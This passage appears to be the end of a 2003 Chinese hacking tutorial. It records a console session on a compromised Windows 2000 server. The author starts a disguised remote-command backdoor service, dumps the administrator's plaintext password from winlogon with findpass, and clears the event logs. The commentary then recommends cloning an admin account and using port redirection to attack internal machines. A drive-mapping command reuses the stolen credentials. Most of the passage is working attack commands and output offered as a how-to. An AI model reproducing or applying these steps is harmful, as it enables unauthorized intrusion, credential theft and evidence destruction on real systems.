SERVICE_NAME: rpc support services
TYPE : 10 WIN32_OWN_PROCESS
STATE : 2 START_PENDING
(NOT_STOPPABLE,NOT_PAUSABLE,
IGNORES_SHUTDOWN)
WIN32_EXIT_CODE : 0 (0x0)
SERVICE_EXIT_CODE : 0 (0x0)
CHECKPOINT : 0x0
WAIT_HINT : 0x7d0
/*在这里我们用sc启动刚才创建的Remote Command Service服务。*/
/*下面连上对方服务器*/
c:\\>rcmd
Enter Server Name : xxx.xxx.xxx.xxx
Connect to \\\\xxx.xxx.xxx.xxx
Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-1999 Microsoft Corp.
C:\\Documents and Settings\\Default User.WINNT>pulist
Process PID User
Idle 0
System 8
smss.exe 168 NT AUTHORITY\\SYSTEM
csrss.exe 192 NT AUTHORITY\\SYSTEM
winlogon.exe 212 NT AUTHORITY\\SYSTEM
services.exe 240 NT AUTHORITY\\SYSTEM
lsass.exe 252 NT AUTHORITY\\SYSTEM
svchost.exe 408 NT AUTHORITY\\SYSTEM
spoolsv.exe 436 NT AUTHORITY\\SYSTEM
msdtc.exe 464 NT AUTHORITY\\SYSTEM
svchost.exe 596 NT AUTHORITY\\SYSTEM
llssrv.exe 624 NT AUTHORITY\\SYSTEM
regsvc.exe 676 NT AUTHORITY\\SYSTEM
rpcsvc.exe 692 NT AUTHORITY\\SYSTEM
mstask.exe 716 NT AUTHORITY\\SYSTEM
LSESS.EXE 792 NT AUTHORITY\\SYSTEM
tlntsvr.exe 832 NT AUTHORITY\\SYSTEM
VrUpSvr.exe 956 NT AUTHORITY\\SYSTEM
winmgmt.exe 968 NT AUTHORITY\\SYSTEM
dns.exe 980 NT AUTHORITY\\SYSTEM
dfssvc.exe 1064 NT AUTHORITY\\SYSTEM
POP3S.exe 1100 NT AUTHORITY\\SYSTEM
smtpds.exe 1120 NT AUTHORITY\\SYSTEM
svchost.exe 1384 NT AUTHORITY\\SYSTEM
dllhost.exe 1316 NT AUTHORITY\\SYSTEM
internat.exe 1308 SERVER\\Administrator
conime.exe 1680 SERVER\\Administrator
VRMONSVC.EXE 872 NT AUTHORITY\\SYSTEM
inetinfo.exe 1456 NT AUTHORITY\\SYSTEM
explorer.exe 1548 SERVER\\Administrator
cmd.exe 1712 SERVER\\Guest
pulist.exe 532 SERVER\\Guest
/*我们可以看到winlogon.exe的进程号是212*/
C:\\Documents and Settings\\Default User.WINNT>findpass server
administrator 212
To Find Password in the Winlogon process
Usage: fidp DomainName UserName PID-of-WinLogon
The debug privilege has been added to PasswordReminder.
The WinLogon process id is 214 (0x000000d6).
To find server\\administrator password in process 214 ...
The encoded password is found at 0x01a00800 and has a length of 3.
The logon information is: server/administrator/Tgrh87fd.
The hash byte is: 0xb8.
/*在winlogon中查找administrator的名文口令*/
C:\\Documents and Settings\\Default User.WINNT>clealog
clealog done
/*清除日志记录*/
C:\\Documents and Settings\\Default User.WINNT>
到这里我们已经看到administrator的密码是Tgrh87fd
至此我们拿到了管理员的密码并安放了一个rcmdsvc的后门,
当然你还可以接着做许多事。比如利用Adam发现的Bug再克
隆一个管理员账号。或者用sc把对方的Tlntsvr服务启起来。
不过后者比较容易被发现,不推荐。如果你对他的内网的
某台机感兴趣而且该机也有漏洞,可以用fpipe做端口重定
向后为下一步的进攻做准备。 作者: 孙大圣 时间: 2003-02-11 16:00
net use z: \\\\xxx.xxx.xxx.xxx \"password\" /user:\"administrator\"